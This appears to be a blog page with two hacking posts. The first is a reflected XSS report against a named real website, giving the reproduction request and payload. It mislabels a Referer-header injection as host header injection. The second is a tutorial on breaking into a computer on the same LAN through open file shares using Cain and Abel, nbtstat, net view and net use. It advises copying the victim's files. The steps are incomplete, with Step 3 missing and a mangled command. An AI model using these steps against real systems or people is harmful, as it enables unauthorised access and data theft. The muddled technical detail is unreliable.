This blog is all about Cyber Security and IT

Showing posts with label hacks. Show all posts
Showing posts with label hacks. Show all posts

Wednesday, April 22, 2020

XSS found using host header injection


This vulnerability arise when you give any input to the host parameter and it may reflect back .

 Impact

An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

Real World Example:

Path : /billing-admin/profile/subscription/?l=de
Payload : c5obc'+alert(1)+'p7yd5
Steps to reproduce :
Request Header :
GET /billing-admin/profile/subscription/?l=de HTTP/1.1
Host: www.semrush.com
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c5obc'+alert(1)+'p7yd5
Overview :
The payload c5obc'+alert(1)+'p7yd5 was submitted in the Referer HTTP header. Payload is copied from a request and echoed into the application's immediate response in an unsafe way.


In the above example the payload reflect back in the response causing the rise of the vulnerability.

Wednesday, April 25, 2018

Hack Into A Computer Which Is Connect On same network(LAN)




Step 1:- Finding the target


So first off we need to find a computer or the computer to hack into. So if your
plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and
Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local sub net. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross.



Another window will pop up, make sure “All host in my subnet” is selected, and then

click ok.

It should begin to scan.




Then IP’s, computer names, and mac addresses will show up


Now remember the IP address of the computer you are going to be breaking into.

If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.



Step 2:- Trial and error

Now, we don’t know if we have our designated target, or if we have a computer or
printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this
section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the
command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you
type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping
192.168.1.103.”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private
information):



IF it didn’t work, meaning that the target is not online, it will look something like this:



If the target is not online, either switch to a different target, or try another time.
If the target is online, then we can proceed.





Step 4:– Gathering the information

Now, input this command “nbtstat –a (IP address of target).” An example would be
nbtstat –a 192.168.1.103.”
This will show us if there is file sharing enabled, and if there is, it will give us the:
currently logged on user, workgroup, and computer name.



Step 5:- Getting In

Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s
computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view 
(IP Address of Target)”
An example for this tutorial would be: “net view 192.168.1.103



We have our just found our share name. In this case, under the share name is “C,”

meaning that the only shared thing on the computer is C. Then to the right, under
Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C
DISK can sometimes be an entire person’s hard drive.



As you can see, for my hack I have already used “K,” so I used “G” instead.

You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network
drive should be there.



Now, if you disconnect from the WAN or LAN, you will not be able to access this
drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to
access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files
and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.






Congratulations! You’re DONE!

-Commands used in this tutorial:
PING
NBTSTAT -a (IP Address of Target)
NET VIEW (IP Address of Target)
NET USE K: (IP Address of Target)(SHARENAME)
-Program used in this tutorial:
Cain and Abel.